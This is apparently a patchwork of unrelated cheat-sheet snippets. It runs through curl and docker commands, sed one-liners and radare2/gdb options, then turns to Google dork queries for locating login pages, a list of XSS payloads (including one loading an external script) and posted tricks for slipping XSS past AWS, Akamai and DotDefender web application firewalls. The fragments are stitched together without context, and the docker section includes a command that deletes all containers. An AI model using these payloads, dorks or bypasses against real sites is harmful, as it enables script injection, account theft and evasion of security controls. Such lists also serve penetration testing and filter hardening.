- XML GET
curl -H "Accept: application/xml" -H "Content-Type: application/xml" -X GET "http://hostname/resource"- JSON GET
curl -i -H "Accept: application/json" -H "Content-Type: application/json" -X GET "http://hostname/resource"- JSON PUT
| docker build -t friendlyname . # Create image using this directory's Dockerfile | |
| docker run -p 4000:80 friendlyname # Run "friendlyname" mapping port 4000 to 80 | |
| docker run -d -p 4000:80 friendlyname # Same thing, but in detached mode | |
| docker exec -it [container-id] bash # Enter a running container | |
| docker ps # See a list of all running containers | |
| docker stop <hash> # Gracefully stop the specified container | |
| docker ps -a # See a list of all containers, even the ones not running | |
| docker kill <hash> # Force shutdown of the specified container | |
| docker rm <hash> # Remove the specified container from this machine | |
| docker rm $(docker ps -a -q) # Remove all containers from this machine |
curl -H "Accept: application/xml" -H "Content-Type: application/xml" -X GET "http://hostname/resource"curl -i -H "Accept: application/json" -H "Content-Type: application/json" -X GET "http://hostname/resource"| FILE SPACING: | |
| # double space a file | |
| sed G | |
| # double space a file which already has blank lines in it. Output file | |
| # should contain no more than one blank line between lines of text. | |
| sed '/^$/d;G' |
Command line options
-L: List of supported IO plugins
-q: Exit after processing commands
-w: Write mode enabled
-i [file]: Interprets a r2 script
-A: Analyze executable at load time (xrefs, etc)
-n: Bare load. Do not load executable info as the entrypoint
-c 'cmds': Run r2 and execute commands (eg: r2 -wqc'wx 3c @ main')
-p [prj]: Creates a project for the file being analyzed (CC add a comment when opening a file as a project)
→ break <address> : Sets a new breakpoint
→ delete <breakpoint#> : Deletes a breakpoint
→ enable < breakpoint#> : Enable a disabled breakpoint
→ print <query> : Prints content of variable or register.
→ display : Prints the information after stepping each instruction
| site:*/sign-in | |
| site:*/account/login | |
| site:*/forum/ucp.php?mode=login | |
| inurl:memberlist.php?mode=viewprofile | |
| intitle:"EdgeOS" intext:"Please login" | |
| inurl:user_login.php | |
| intitle:"Web Management Login" | |
| site:*/users/login_form | |
| site:*/access/unauthenticated | |
| site:account.*.*/login |
| ';alert(String.fromCharCode(88,83,83))//';alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//--></SCRIPT>">'><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT> | |
| '';!--"<XSS>=&{()} | |
| 0\"autofocus/onfocus=alert(1)--><video/poster/onerror=prompt(2)>"-confirm(3)-" | |
| <script/src=data:,alert()> | |
| <marquee/onstart=alert()> | |
| <video/poster/onerror=alert()> | |
| <isindex/autofocus/onfocus=alert()> | |
| <SCRIPT SRC=http://ha.ckers.org/xss.js></SCRIPT> | |
| <IMG SRC="javascript:alert('XSS');"> | |
| <IMG SRC=javascript:alert('XSS')> |
| @vanshitmalhotra | Bypass AWS WAF -// | |
| Add "<!" (without quotes) before your payload and bypass that WAF. :) | |
| eg: <!<script>confirm(1)</script> | |
| @black0x00mamba | Bypass WAF Akamaighost & filtered onload, onclick, href, src, onerror, script, etc | |
| <img sr%00c=x o%00nerror=((pro%00mpt(1)))> | |
| DotDefender WAF bypass by @0xInfection | |
| <bleh/ondragstart=	parent	['open']	()%20draggable=True>dragme |